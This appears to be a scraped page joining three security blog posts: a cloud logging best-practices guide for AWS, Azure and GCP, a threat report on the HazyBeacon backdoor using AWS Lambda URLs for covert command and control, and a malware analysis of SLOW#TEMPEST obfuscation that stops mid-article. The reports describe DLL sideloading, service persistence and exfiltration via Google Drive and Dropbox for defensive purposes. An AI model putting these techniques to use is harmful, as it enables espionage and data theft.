Cloud Logging for Security and Beyond

Posted on by Sheida Azimi

Executive Summary

This article aims to simplify cloud logging best practices for each major cloud service provider (CSP) while considering security, regulatory and business requirements.

As more organizations migrate their business operations to the cloud, a crucial question arises: “What logging should we enable in order to monitor and secure our cloud environment?” To answer that question holistically, organizations must consider many factors, including:

  • Business needs
  • Regulatory requirements
  • Security use cases
  • Cost optimization

Amazon Web Services (AWS), Azure and Google Cloud Platform (GCP) provide various unique logging configurations for visibility into cloud resources. These diverse logs, when aggregated, constitute the organization's cloud logging framework.

Defining cloud logging requirements can be overwhelming. Organizations often use multiple CSPs, which have varying terminology, logging types and retention periods. This article explains the key components of a successful, customizable cloud logging framework.

Disclaimer: The information in this article regarding legal and regulatory requirements is being provided for general awareness only and does not constitute legal advice. Always consult a qualified lawyer on any specific legal problem or matter, including but not limited to logging and data requirements applicable to your organization.

Organizations can gain help assessing cloud security posture through the Unit 42 Cloud Security Assessment.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics AWS, AzureGCP, Kubernetes

Data Plane vs. Control Plane

To understand the types of cloud activities to monitor, cloud practitioners must first understand the difference between the data plane and the control plane. While the data plane supplies the base functionality of each cloud service provider, the control plane is a layer above that and manages the cloud resource operations themselves.

The data plane provides the underlying function of the CSP service, such as:

  • Connecting into a virtual machine
  • Placing items into object-level storage
  • Creating a database table

The control plane, on the other hand, enables the administration and management of resources within each CSP. For example:

  • Logging into a CSP console
  • Making API calls to modify resources
  • Creating new resources

While both data and control planes exist within every CSP, their native logging capabilities vary. Control plane logging exists for each CSP by default, but with different configurations available. This is in contrast to data plane logging, for which logging does not exist by default.

Understanding these distinctions clarifies the various logging components within each CSP and their relevance to business needs.

General Logging Considerations

Organizations should consider a variety of factors when determining which logs to ingest to create an effective cloud logging strategy. To maximize the use of the cloud logs across all business functions and IT teams, centralizing the logs into a Security Information and Event Management (SIEM) solution allows for increased visibility and utility. The “one size fits all” approach does not meet specific logging and retention requirements for every organization and ends up being extremely cost prohibitive. Organizations must prioritize based on their specific business needs.

For example, retail companies could prioritize operational availability by ingesting performance logs related to critical sales functions. Performance logs vary per system but they record metrics pertaining to the running of the resource. For example, if a lot of network traffic slowed down response times on a web application server, performance logs would record and alert on the network performance issue. Conversely, the financial sector could prioritize logging all interactions with financial databases while retaining them for extended periods to meet regulatory compliance.

The following categories, while broad, provide a foundation for defining logging requirements. Regardless of industry vertical, organizations should consider the subsequent topics.

Critical Business Functions

Critical business functions include the systems, applications and processes necessary to ensure the availability of business operations. Critical business functions will differ based on each organization's unique requirements.

For example, some companies need to maintain a certain level of uptime on their website due to contractual obligations with stakeholders. Other organizations may need to ensure timely data processing due to regulatory requirements. Clearly defining these critical business functions and their dependencies is the first step in creating informed logging decisions.

Conducting Business Impact Analyses (BIAs) supports this by identifying and assessing the potential effects of disruptive events to critical business operations, such as natural disasters, cyberattacks or systemic technology failures. BIAs estimate the financial and operational impact of such disruptions, considering factors like lost revenue, recovery costs and regulatory fines.

Figure 1 provides an example decision diagram for considering how various business decisions impact overall logging criticality.

Chart depicting the overall criticality assessment in business, categorized into four main sections: Application/Platform/System Assessment, Non-Quantitative Loss Assessment, Quantitative Financial Loss Assessment, and Business Assessment. Each section includes specific risk types or business aspects such as Application Information, Reputational Risk, Financial Impact, and Business Owners. Palo Alto Networks and Unit 42 logo lockup.
Figure 1. Example BIA methodology decision diagram.

After identifying these critical business functions, organizations should prioritize ingesting the appropriate logs for them. For example, collecting data plane network logging provides visibility into inbound network traffic to determine whether a performance issue with a critical service stems from increased user activity.

Similarly, if virtual machines within an autoscaling group report issues scaling to meet demand, collecting audit logs at the control plane level will help identify the reason for the failed deployment. Autoscaling consists of resources being automatically created or destroyed to meet the demands of an application or service.

In autoscaling environments, terminated instances can lose logs without proper collection and aggregation strategies. To mitigate this risk, organizations can implement centralized logging by exporting logs to persistent storage or a logging service, allowing the preservation of critical data even as virtual machines cycle. By aligning logging requirements with business needs, organizations can create a strategic approach to log retention and ingestion, ensuring visibility into essential operational and security events.

Regulatory and Data Requirements

Organizations should identify applicable regulatory frameworks to prevent legal penalties, maintain customer trust and ensure responsible data handling. These frameworks often impose specific data retention and logging requirements, influencing the type of logs an organization must collect and store.

To navigate these complexities, collaborating with the organization’s compliance and legal teams can help clarify applicable regulatory requirements, which largely depend on the organization’s industry, location and types of data processed. A proactive approach to regulatory alignment helps ensure adherence to legal mandates while supporting secure and transparent business operations.

The following are some of the common regulatory frameworks that may apply to organizations:

General Data Protection Regulation (GDPR):

This regulation applies to organizations processing personal data of European Union residents, regardless of the organization's location. It mandates data privacy and protection, including but not limited to, what data can be logged and individuals' rights to their data. For instance, GDPR’s Article 17 (e.g., “the right to be forgotten”) requires organizations to delete personal data upon request in certain circumstances, requiring an organization to accurately locate and remove data.

Health Insurance Portability and Accountability Act (HIPAA):

A U.S. regulation for protecting sensitive protected health information (PHI). HIPAA dictates strict requirements for logging access to and modification of PHI, along with data retention and security controls. For example, HIPAA’s audit control standards may require healthcare organizations to log every instance of access to a patient’s medical record, providing a comprehensive audit trail in the event of unauthorized access or a data breach.

Payment Card Industry Data Security Standard (PCI DSS):

This regulation applies to any organization handling payment card information, mandating specific logging and retention requirements for system components involved in card processing. For instance, an online retailer may be required to log every instance of database access where it has stored credit card information, including timestamps, user IDs and the specific action performed.

National Institute of Standards and Technology (NIST) Cybersecurity Framework and NIST Special Publications (SP) 800-Series:

While not strictly regulatory frameworks, these provide valuable information security guidance and best practices for organizations across various sectors. They often influence the development of industry-specific regulations, as many industries (e.g., finance, energy, telecommunications) have their own specific logging and data protection regulations.

For example, a financial institution adopting these recommendations might log all instances of someone attempting to access account information outside of normal business hours. This could increase its ability to detect and respond to potential malicious activity by allowing the organization to maintain a more robust security posture even in the absence of a specific legal mandate.

Security Operations Considerations

Logging establishes a baseline of information necessary to equip security teams with the data to support security monitoring, threat hunting and incident response activities. These logs should provide:

  • Detailed audit trails of user activity
  • System changes
  • Security-relevant events
  • The complete context of an incident

For effective incident response, logging should cover a range of activity across the network perimeter, internal system interactions and user behaviors. This enables responders to determine the extent of unauthorized actions. Insufficient logging can obscure threat actor activity, potentially jeopardizing regulatory compliance and critical security decisions.

For example, the threat actor group JavaGhost exploits victims’ cloud environments to establish phishing infrastructure targeting other organizations. Audit logs capture the creation of this infrastructure on the control plane, but detecting phishing emails sent from compromised resources requires enabling data plane logs. Ensuring visibility into both planes allows organizations to proactively identify, contain and mitigate threats before they escalate. More information about these attacks can be found in this recent Unit 42 research: JavaGhost’s Persistent Phishing Attacks From the Cloud.

Cost Optimization

To meet regulatory and security requirements, organizations often default to logging as much data as possible “just in case.” This method increases costs and hinders log analysis by creating more extraneous data to sort through to understand suspicious activities.

For example, the AWS Simple Storage Service (S3), which helps organizations store objects, provides the ability to log data events either in AWS CloudTrail or via S3 server access logging. While enabling one of these features provides ample visibility into S3 data events, costs can escalate dramatically if not managed properly. Managing the costs of storing the data can include transitioning data to different S3 bucket storage types or shortening retention periods. Excessive data volume can also hinder efficient query and analysis.

Furthermore, excessive logging potentially violates privacy regulations, as certain regulatory frameworks (such as GDPR Article 5(1)(c)) emphasize collecting and retaining only necessary logs. Instead of indiscriminate logging, organizations should consider adopting a targeted logging strategy. This involves clearly defining business, regulatory and security requirements to optimize ingestion and retention costs. By doing this, organizations can optimize the ingestion and retention costs associated with logging.

Categories of Logging

For easier comparison across AWS, Azure and GCP, we've grouped common services into high-level categories. These categories include:

  • Audit
  • Compute
  • Network
  • Secrets
  • Cloud-native storage
  • Database
  • Kubernetes

Each category typically requires both data and control plane level logging to gain comprehensive visibility into all activity. Consider these categories in light of your organization's specific business, regulatory and security needs.

Audit

Audit logs provide a comprehensive record of user activities and system changes, including configuration modifications, administrative actions and resource deployments. These logs primarily capture control plane operations, including a range of management-type activities. AWS, Azure and GCP enable audit logging by default, ensuring visibility into critical administrative events.

Regarding identity logging, AWS and GCP integrate authentication, authorization and login events within their audit logs, whereas Azure maintains separate identity-specific log types. Understanding these differences helps organizations tailor monitoring strategies for security and compliance. Additional information about audit logs can be found in the Visualizing Cloud Log Events section.

Compute

Compute logs provide information about resources like virtual machines and serverless functions. The creation, deletion and modification events of these resources live within the audit logs, while details such as memory and CPU usage exist within data plane logs unique to each CSP.

Additional information, such as the actual execution of a serverless function, also exists within the data plane logs. With the prevalence of compute resources in most CSP environments, data plane logging is essential for visibility into their usage.

Network

Network appliance services in AWS, Azure and GCP provide an additional layer of security that helps protect cloud workloads. Networking-related events, such as firewalls blocking incoming network connections, network flows and network configuration changes, exist within both control and data plane logs.

Organizations must specifically enable data plane logging for full visibility into network connection type events. The high storage costs associated with network logging make cost optimization a key consideration.

As discussed in the General Logging Consideration section, network visibility gaps impact both incident response investigations and routine troubleshooting activities when these logs do not exist.

Secrets

The concept of secrets commonly arises when learning about the cloud. Secrets represent any data or information an organization deems sensitive and wants to store in a secure location with limited access.

Each CSP has unique services that provide this functionality with accompanying logs that record the entities interacting with and retrieving the data such as recording the updating the secret value or modifying its description. These secrets include anything from credentials and API keys to environment variables. Control plane and data plane logging provide a detailed audit trail of secret modification, retrieval and creation, which allows visibility into the lifecycle of these resources.

Cloud-Native Storage

In addition to traditional database services, CSPs introduce cloud-native storage solutions typically built for objects. Objects encompass everything from files and documents to snapshots and backups.

These non-relational data types require data plane logging for visibility into object interaction. Depending on the sensitivity of the data, observability might play an important role in the general logging considerations as discussed in the Regulatory and Data Requirements section above.

When considering logging visibility into cloud-native storage, note that threat actors commonly target it for data exfiltration. This fact impacts the decision of whether to log data access.

Database

Each CSP provides unique cloud-native database services that organizations can incorporate into various applications or environments. Database transaction logs provide a comprehensive understanding of actions taken within the database, representing a key source of information for compliance, regulatory and security considerations.

Similar to the compute and cloud-native storage categories, to review interactions with the database contents themselves, only data plane logging shows these events. If the database contains sensitive data, understanding specific data interactions by a threat actor or rogue employee requires pre-enabled data plane logging. Otherwise, the full scope of activity will not be available to determine data access details.

Kubernetes

Organizations commonly host their Kubernetes clusters in cloud environments, due to the scalability of the platforms, making Kubernetes a significant logging source to consider for complete visibility. At a high level, Kubernetes clusters are composed of various virtual machines (nodes) that run containers within those virtual machines.

Numerous logging configurations exist within Kubernetes to track a cluster’s evolving state. These logs provide visibility into the interactions between the Kubernetes cluster and the control plane, authentication requests and actions taken within a cluster, to name a few examples.

In addition to control plane logging, data plane logging plays a crucial role in capturing workload-level events within Kubernetes clusters. These logs provide visibility into container-level operations, including:

  • Network traffic between pods
  • File system interactions
  • Resource consumption metrics

Data plane logs help security teams detect anomalies such as:

  • Unauthorized lateral movement
  • Excessive resource utilization
  • Suspicious network activity within a cluster

By aggregating data plane logs alongside control plane logs, organizations can gain a comprehensive view of all Kubernetes activity.

Logging Table

Now that we have an understanding of the background and purpose of the various log categories for enterprise environments, we can address the specific logs available for each category by CSP.

The following table (Table 1) breaks down the common AWS, Azure and GCP services that exist in each category, listing the different logging options. As previously mentioned, the creation, modification and deletion of each service resource resides within the different audit logs for control plane visibility, but the data plane logging does not exist by default.

Each service listed in the table has management level events recorded in the audit services, while the information in the parentheses represents the data plane logging available for each type.

AWS Azure GCP
Audit CloudTrail Microsoft Entra ID audit, Microsoft Entra ID sign-in, Azure Activity, Microsoft Graph Activity* (DS) Admin Activity audit, Policy Denied audit, System Event audit
Compute Elastic Cloud Compute (EC2), Lambda (DE) Virtual machines, Azure Functions (DS) Virtual machines, Cloud Run (DA)
Network VPC (VPC flow logs), Route 53 (resolver query logs), web application firewall (WAF) (web access control traffic logs), Elastic Load Balancer (ELB) (access logs) Virtual networks (virtual network flow logs, legacy: NSG flow logs), Azure Firewall (DS), Azure Load Balancer (virtual network flow logs), Azure Front Door WAF (DS), Azure WAF (Application Gateway DS), Azure DNS (Security policy DS) VPC network (VPC flow logs, Firewall Rules Logging), Cloud DNS (DNS policy query logging), Cloud load balancer (load balancer request logs)
Secrets Secrets Manager, Key Management Service (KMS) Key Vault (DS) Secret Manager (DA), Cloud KMS (DA)
Cloud-native storage Simple Storage Service (S3) (DE and S3 server access logs) Storage Account (DS) Cloud Storage (DA, usage logs)
Database DynamoDB (DE), Relational Database Service (RDS) (DE and database logs), Redshift (audit logs) Cosmo DB (DS), Azure SQL Database (audit logs) BigQuery (DA), Datastore (DA), Cloud SQL (DA)
Kubernetes Elastic Kubernetes Service (EKS) (cluster logging) Azure Kubernetes Service (AKS) (DS) Google Kubernetes Engine (GKE) (Kubernetes control plane logs)

Table 1. Cloud Service Provider logging options by category.

Visualizing Cloud Log Events

Understanding the nuances within each CSP’s logs forms the cornerstone to comprehending cloud logging holistically. We illustrate the complexities of cloud logging below with examples from AWS, Azure and GCP, showing where specific events appear across the different CSPs.

Each scenario shows a user:

  • Logging in to the CSP’s interactive console
  • Creating a new user
  • Interacting with and creating resources specific to that CSP

The associated key in Figure 2 explains which logs exist by default and which logs require enablement.

Diagram featuring five labeled blocks representing system processes: "CSP Audit Log (Enabled By Default)," "User Login," "New User Created," "Creation/Interaction With CSP-Specific Resources," and a diamond-shaped block "Not Enabled By Default." Palo Alto Networks and Unit 42 logo lockup.
Figure 2. Key to Figures 3, 4 and 5 below.

Figure 3 shows the creation of a new identity and access management (IAM) user, Lambda function and S3 bucket that all result in artifacts present in the CloudTrail logs. In this case, the Lambda function execution does not exist by default and requires additional data plane logging for complete visibility.

Flowchart illustrating AWS (Amazon Web Services) user actions and outcomes, including login, IAM user and access key creation, and Lambda function events, with success and permission failure icons. Palo Alto Networks and Unit 42 logo lockup.
Figure 3. Example AWS scenario.

Figure 4 shows similar administrative activities to those detailed in Figure 3, but this time for Azure. Due to the variety of Azure log types, the audit activities exist across multiple log types, but activities such as Key Vault key retrieval require additional data plane logging similar to the AWS Lambda function execution.

Flowchart describing a process on Microsoft Azure, involving steps from signing into Microsoft Azure, through various security and application procedures, to the creation of a Virtual Machine. Palo Alto Networks and Unit 42 logo lockup.
Figure 4. Example Azure scenario.

Figure 5 details a GCP example of creating a new user and failing to create a new virtual private cloud (VPC) network with the resulting logs present in the GCP audit logs. To view the retrieval of a secret from Secret Manager, data plane logging must be enabled akin to the secret retrieval action in Azure while AWS has Secret Manager retrieval enabled by default. Similar to AWS, fewer audit log types aggregate all the control plane activity.

Illustration of Google Cloud Platform audit types: Admin Activity Audit, showing a user logging into the GCP console and creating a new user; Policy Denied Audit, depicting an attempt to create a new VPC network failing due to permission limitations; and Data Access Audit, showing a user retrieving a secret from Secret Manager. Icons and simple graphics represent users and cloud interactions. Palo Alto Networks and Unit 42 logo lockup.
Figure 5. Example GCP scenario.

Additional Considerations

We provide default retention information in the Additional Resources section below rather than in the Logging Table above, due to the evolving nature of log retention policies. This allows us to provide direct links to the most up-to-date CSP documentation.

Note that some data plane logs, such as GCP VPC flow logs, only record sampled events, even when fully enabled. This level of detailed knowledge helps organizations understand visibility gaps when trying to troubleshoot or investigate within AWS, Azure and GCP.

Finally, the Logging Table only represents a selection of cloud services and does not cover additional enterprise logging required for comprehensive visibility into an environment. For complete visibility into an environment, organizations must also consider additional logging, such as:

  • Host
  • Application
  • Third-party appliance
  • Email

Conclusion

Successfully navigating cloud logging requires a holistic approach that balances security, regulatory and business needs and cost optimization. The diverse logging services, tools and best practices of each CSP add to this challenge. Following the best practices laid out within this article will help provide organizations with the knowledge to better understand what logging and monitoring enables the best visibility into their unique cloud environments, while also providing them with better detection and ultimately prevention capabilities.

By implementing the best practices described in this article, organizations should be better positioned to effectively monitor, secure and manage their cloud environments.

Organizations can gain help assessing cloud security posture through the Unit 42 Cloud Security Assessment.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
  • UK: +44.20.3743.3660
  • Europe and Middle East: +31.20.299.3130
  • Asia: +65.6983.8730
  • Japan: +81.50.1790.0200
  • Australia: +61.2.4062.7950
  • India: 00080005045107

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Additional Resources

Cloud Services Information

Regulatory Framework Information

Behind the Clouds: Attackers Targeting Governments in Southeast Asia Implement Novel Covert C2 Communication

Posted on by Samantha Stallings

Executive Summary

Since late 2024, Unit 42 researchers have been tracking a cluster of suspicious activity as CL-STA-1020, targeting governmental entities in Southeast Asia. The threat actors behind this cluster of activity have been collecting sensitive information from government agencies, including information about recent tariffs and trade disputes.

This campaign is particularly noteworthy due to its novel tradecraft. The threat actors have developed a previously undocumented Windows backdoor, which we named HazyBeacon.

This backdoor leverages AWS Lambda URLs as command and control (C2) infrastructure. AWS Lambda URLs are a feature of AWS Lambda that allows users to invoke serverless functions directly over HTTPS. This technique uses legitimate cloud functionality to hide in plain sight, creating a reliable, scalable and difficult-to-detect communication channel.

In this analysis, we aim to provide security teams with the necessary insights to detect and mitigate this emerging threat, while contributing to the broader understanding of how attackers exploit cloud services for malicious purposes.

Figure 1 shows the high-level execution flow of this attack.

Illustration depicting the process of executing arbitrary commands through a Lambda URL endpoint with visual icons representing commands, payloads, balancing instructions, and downloading additional payloads.
Figure 1. Execution flow of Lambda URL abuse.

Palo Alto Networks customers are better protected from the threats described here through the following products and services:

Organizations can gain help assessing cloud security posture through the Unit 42 Cloud Security Assessment.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics Backdoor, AWS

Background

During our investigation of activity cluster CL-STA-1020, we discovered a new, undocumented Windows backdoor that we named HazyBeacon. This backdoor leverages a novel C2 technique in which the backdoor establishes C2 communication via AWS Lambda URLs. This method was first reported by Trellix in June 2025, in the context of an advanced persistent threat (APT) activity.

Based on the threat actors’ actions, it appears that the primary goal behind the attack is covert intelligence gathering. Specifically, they’re collecting sensitive government data, including information related to recent trade disputes.

The tactic of hiding in plain sight was further observed throughout the exfiltration phase of the attack, with the threat actor's use of legitimate services. The threat actor also used Google Drive and Dropbox as exfiltration channels, blending in with normal network traffic.

Backdoor Through the Side Door

During our investigation, we observed that the attackers leveraged DLL sideloading to deploy the HazyBeacon backdoor. They planted a malicious DLL in C:\Windows\assembly\mscorsvc.dll, alongside a legitimate Windows executable, mscorsvw.exe.

When mscorsvw.exe was triggered by its registered Windows service, it loaded the malicious replacement DLL instead of the legitimate Microsoft library. It then connected to the threat actor-controlled Lambda URL as shown in Figure 2 below.

Diagram showing a cybersecurity threat process: "mscorsvw dot exe" sideloads "mscorsvc dot dll", which connects to an AWS Lambda URL, leading to executing arbitrary commands and downloading additional payloads.
Figure 2. DLL sideloading of the HazyBeacon DLL.

To establish persistence on the compromised Windows endpoint, the threat actor created a Windows service named msdnetsvc, which ensured that the HazyBeacon DLL would be loaded even after rebooting the system. Figure 3 below shows this command.

Screenshot of a command-line instruction to create a new service named "Microsoft NET Service" using the sc.exe tool in a Windows environment.
Figure 3. Service control command used to create the persistence.

AWS Lambda URL Misuse

AWS Lambda is a serverless computing service that runs code in response to events without requiring server provisioning or management. AWS introduced Lambda URLs in 2022 to extend this functionality by providing customers with a way to configure dedicated HTTPS endpoints for Lambda functions. These endpoints allow the functions to be invoked directly using standard web requests, without the need for complex API Gateway configurations.

The manipulation of this service has several tactical advantages for threat actors. When put to malicious use, a Lambda function that a threat actor controls can operate as a dynamic C2 server that receives beaconing requests from compromised systems.

Hiding Behind the Clouds

Communication with AWS-hosted services that establish amazonaws[.]com domains is a common practice, due to legitimate business dependencies. Many newer AWS services and features that allow customers to configure infrastructure use DNS names like on.aws. However, threat actors often create their own AWS accounts or use compromised AWS accounts — and the network services of these accounts — to disguise their malicious operations. This can enable their malicious network actions to bypass traditional detection within enterprise environments.

A Novel Approach to C2

The malicious DLL observed in the attack, mscorsvc.dll, established a C2 channel through an AWS Lambda URL. This essentially utilized a serverless architecture that allowed the attacker to blend their C2 traffic with legitimate AWS communications, in an attempt to evade traditional network detection.

Once the malware started beaconing to the actor-controlled Lambda URL endpoint at <redacted>.lambda-url.ap-southeast-1.on[.]aws, it began receiving commands to execute and additional payloads to download.

As a result, the malware downloaded and stored the payloads listed in Table 1 under C:\ProgramData.

File Path Description
C:\ProgramData\7z.exe Legitimate 7-Zip utility to archive files
C:\ProgramData\igfx.exe File collector
C:\ProgramData\GoogleGet.exe Connects to a Google Drive (using a given drive ID as an argument) and performs authentication
C:\ProgramData\google.exe Custom Google Drive file uploader
C:\ProgramData\GoogleDrive.exe Custom Google Drive file uploader
C:\ProgramData\GoogleDriveUpload.exe Custom Google Drive file uploader
C:\ProgramData\Dropbox.exe Custom Dropbox file uploader

Table 1. Payloads downloaded by HazyBeacon.

Figure 4 shows the full execution flow, including the payloads listed above.

Flowchart showing the process of using multiple tools to attribute data, including well-known entities such as GoogleDrive and Microsoft Teams, connected by various actions and decisions.
Figure 4. Full execution flow of the attack.

Collecting Data

The first payload executed was igfx.exe — the file collector. This tool receives a time range and file extensions as input, then creates a ZIP archive (named after the machine) containing all the collected files. Figure 5 shows this payload.

Code snippet showing an EXE file and a date range along with various file types.
Figure 5. Igfx.exe file collector payload.

After creating the ZIP file, the attackers used 7z.exe to create several 200 MB-sized files from the ZIP, as shown in Figure 6.

Code snippet for a 7-ZIP file to be a specified size.
Figure 6. 7z.exe file storage payload.

The attacker then conducted targeted reconnaissance, executing a search for documents related to the ongoing trade war, such as the search shown in Figure 7 below for “letter to US President on Tariffs measures.”

Command prompt screenshot showing a search for a PDF titled "Redacted Letter to US President on Tariffs Measures.
Figure 7. Command to search for specific communications.

Exfiltration

The threat actors attempted to use multiple utilities for the purpose of exfiltrating the files collected from the compromised network.

First, they used GoogleGet.exe to connect to their own Google Drive repository, giving the drive ID as an argument. Then, the threat actors used the utilities shown in Figure 8 to try to upload the files to Google Drive and Dropbox. All of these upload attempts were correctly flagged by the detection mechanism as malicious and were blocked.

Text showing file paths for executable programs in Windows, including Google Drive and Dropbox, with all paths starting from the C: drive.
Figure 8. Attempts to upload files to repositories.

Following these exfiltration attempts, the attacker executed cleanup commands to remove evidence of their activities. They deleted the archive files they had created, along with all the payloads.

Conclusion

This research article details a new cluster of activity, tracked as CL-STA-1020, which targets government entities in Southeast Asia. This cluster took significant effort to remain undetected, hiding in plain sight. They also leveraged a novel technique for covert malware C2 communication via AWS Lambda function URLs.

Our investigation also uncovered a previously undocumented Windows backdoor that we named HazyBeacon. The threat actors used HazyBeacon as the main tool for maintaining a foothold and collecting sensitive information from the affected governmental entities. The data exfiltration attempts leveraged legitimate cloud storage services, blending their activity with normal network traffic.

This campaign highlights how attackers continue to find new ways to abuse legitimate, trusted cloud services. Security teams should prioritize enhanced monitoring of cloud resource usage. These teams should also develop detection strategies that can identify suspicious patterns of communication with trusted cloud services to better detect and prevent such attacks.

Palo Alto Networks Protection and Mitigation

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

  • The Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated in light of the indicators shared in this research.
  • Cortex XDR and XSIAM customers are better protected against the threat mentioned in this article by the Behavioral Threat Protection module that detects and blocks the execution of processes with malicious behavior, and machine learning based Local Analysis module, which can prevent the execution of known and unknown malware
  • Cortex Cloud customers are better protected from the topics discussed within this article through the proper placement of Cortex Cloud XDR endpoint agent and serverless agents within a cloud environment. Designed to protect a cloud’s posture and runtime operations against these threats through the detection and prevention of the malicious operations or configuration alterations or exploitations discussed within this article.

Organizations can gain help assessing cloud security posture through the Unit 42 Cloud Security Assessment.

If you think you might have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
  • UK: +44.20.3743.3660
  • Europe and Middle East: +31.20.299.3130
  • Asia: +65.6983.8730
  • Japan: +81.50.1790.0200
  • Australia: +61.2.4062.7950
  • India: 00080005045107

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

  • SHA256 hashes for the Lambda-URL backdoor (C:\Windows\assembly\mscorsvc.dll)
    • 4931df8650521cfd686782919bda0f376475f9fc5f1fee9d7cf3a4e0d9c73e30
  • SHA256 hashes for the Google Drive file uploader (C:\ProgramData\google.exe)
    • d20b536c88ecd326f79d7a9180f41a2e47a40fcf2cc6a2b02d68a081c89eaeaa
  • SHA256 hashes for the Google Drive file uploader (C:\ProgramData\GoogleDrive.exe)
    • 304c615f4a8c2c2b36478b693db767d41be998032252c8159cc22c18a65ab498
  • SHA256 hashes for the Google Drive file uploader (C:\ProgramData\GoogleDriveUpload.exe)
    • f0c9481513156b0cdd216d6dfb53772839438a2215d9c5b895445f418b64b886
  • SHA256 hashes for the Dropbox file uploader (C:\ProgramData\Dropbox.exe)
    • 3255798db8936b5b3ae9fed6292413ce20da48131b27394c844ecec186a1e92f
  • SHA256 hashes for the file collector (C:\ProgramData\igfx.exe)
    • 279e60e77207444c7ec7421e811048267971b0db42f4b4d3e975c7d0af7f511e
  • SHA256 hashes for the Google Drive connect tool (C:\ProgramData\GoogleGet.exe)
    • d961aca6c2899cc1495c0e64a29b85aa226f40cf9d42dadc291c4f601d6e27c3

Additional Resources

Evolving Tactics of SLOW#TEMPEST: A Deep Dive Into Advanced Malware Techniques

Posted on by Mark Lim

Executive Summary

In late 2024, we discovered a malware variant related to the SLOW#TEMPEST campaign. In this research article, we explore the obfuscation techniques employed by the malware authors. We deep dive into these malware samples and highlight methods and code that can be used to detect and defeat the obfuscation techniques.

Understanding these evolving tactics is essential for security practitioners to develop robust detection rules and strengthen defenses against increasingly sophisticated threats.

We focus on the following techniques used by the threat actors for the SLOW#TEMPEST campaign:

  • Control flow graph (CFG) obfuscation using dynamic jumps
  • Obfuscated function calls

Palo Alto Networks customers are better protected from the threats discussed in this article through the following products and services:

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics Anti-analysis, DLL sideloading

Background

In this article, we analyze a more recent variant of the malware sample (SHA256 hash: a05882750f7caac48a5b5ddf4a1392aa704e6e584699fe915c6766306dae72cc) from the SLOW#TEMPEST campaign. The attackers distribute the malware as an ISO file, which is a common technique used to bundle multiple files to potentially evade initial detection. This ISO file contains 11 files; two are malicious, and the remainder are benign.

The first malicious file is zlibwapi.dll, which we’ll refer to as loader DLL, decrypts and executes the embedded payload. The payload is not integrated into the loader DLL in a typical manner. Instead, it is appended to the end of another DLL named ipc_core.dll.

The loader DLL is executed via DLL side-loading by a legitimate signed binary named DingTalk.exe. DLL side-loading is a technique where attackers use a legitimate program to load a malicious DLL file, causing the legitimate program to execute the attacker's code. Separating the payload from the loader DLL complicates detection, as the malicious code will only execute if both the loader and payload binaries are present.

In the following sections, we dive deeper into the anti-analysis techniques used by the malware authors to obfuscate the code in the loader DLL.

Control Flow Graph (CFG) Obfuscation Using Dynamic Jumps

CFG obfuscation alters the execution order of program instructions, making static and dynamic analysis more difficult. This makes it harder to understand the program’s logic, identify malicious functionality and create effective signature-based detection.

For static analysis, traditional tools relying on linear sequences or predictable control flow become ineffective. Dynamic analysis also becomes more challenging because misleading execution paths obscure actual malicious operations. CFG obfuscation breaks the mapping between the original source or compiled code and runtime execution, making it significantly more difficult to create reliable detection rules.

To demonstrate this technique, we analyze the application of CFG obfuscation, specifically using dynamic jumps to the loader DLL's main function. Figure 1 illustrates the CFGs of this function, both with and without obfuscation. Once we remove the obfuscation, the continuous code flow becomes apparent, marked by two colored lines:

  • Green for True branches
  • Red for False branches
Two vertical diagrams comparing an obfuscated function and the same function with obfuscation removed. Both diagrams feature lines and boxes representing functional elements, connected by vertical and horizontal lines to show their interactions. The left diagram labeled "Obfuscated Function" is more complex with many boxes linked by yellow lines. The right diagram labeled "Obfuscation Removed" is simplified with fewer elements. There are fewer boxes and the lines interconnecting them are red and green. The green line is only on the right of the diagram and multiple red lines appear on both the left and the right.
Figure 1. CFGs of the main function for the loader DLL with and without obfuscation.

This function is extensive, comprising over 17,000 lines of assembly instructions. Given the size of the main function for the loader DLL, we turned to the Hex-Rays decompiler to speed up analysis. However, the Hex-Rays decompiler was only able to generate 10 lines of pseudocode for the same main function, as shown in Figure 2.

Screenshot of code in an Integrated Development Environment, featuring C++ syntax with functions and conditional statements highlighted in various colors.
Figure 2. Pseudocode generated by Hex-Rays of the main function for the loader DLL.

The reason for the incomplete Hex-Rays decompiler output is because the sample used dynamic jump instructions. Dynamic jumps are where target addresses in code are computed at runtime.

Unlike direct jumps to fixed addresses, dynamic jumps make it impossible for the decompiler to determine the execution flow without actually running the program. This lack of a clear, predetermined path severely hinders the decompiler's ability to reconstruct the original high-level code, often leading to incomplete or inaccurate decompilation results.

Figure 3 shows one of the dynamic jumps using the JMP RAX instruction near the entry point of the main function of the loader DLL. The JMP instruction will cause the execution flow to be diverted to a different target address.

The target address depends on factors like memory contents, register values and the results of conditional checks performed during execution. In this case, it is computed at runtime by a sequence of preceding instructions and stored in the CPU register RAX.

A screenshot of a computer screen displaying colorful assembly language code in a text editor, with various operations and hexadecimal values highlighted. JMP is highlighted in pink.
Figure 3. One dynamic jump in the main function for the loader DLL.

We countered CFG obfuscation employing dynamic jumps by first identifying all instances of these jumps using the IDAPython script shown in Figure 4.

Screenshot of computer code in an IDE, featuring functions and loops written in Python.
Figure 4. Code to locate dynamic jumps.

Using the above script, we identified 10 dynamic jumps in the main function of the loader DLL.

The dynamic jump target is determined by a preceding sequence of nine instructions, termed a “dispatcher,” before each JMP RAX instruction. These 10 dispatchers, found within the loader DLL's main function, share a similar structure. However, each dispatcher uses a distinct set of instructions to compute the jump's destination address, effectively hiding the program's control flow.

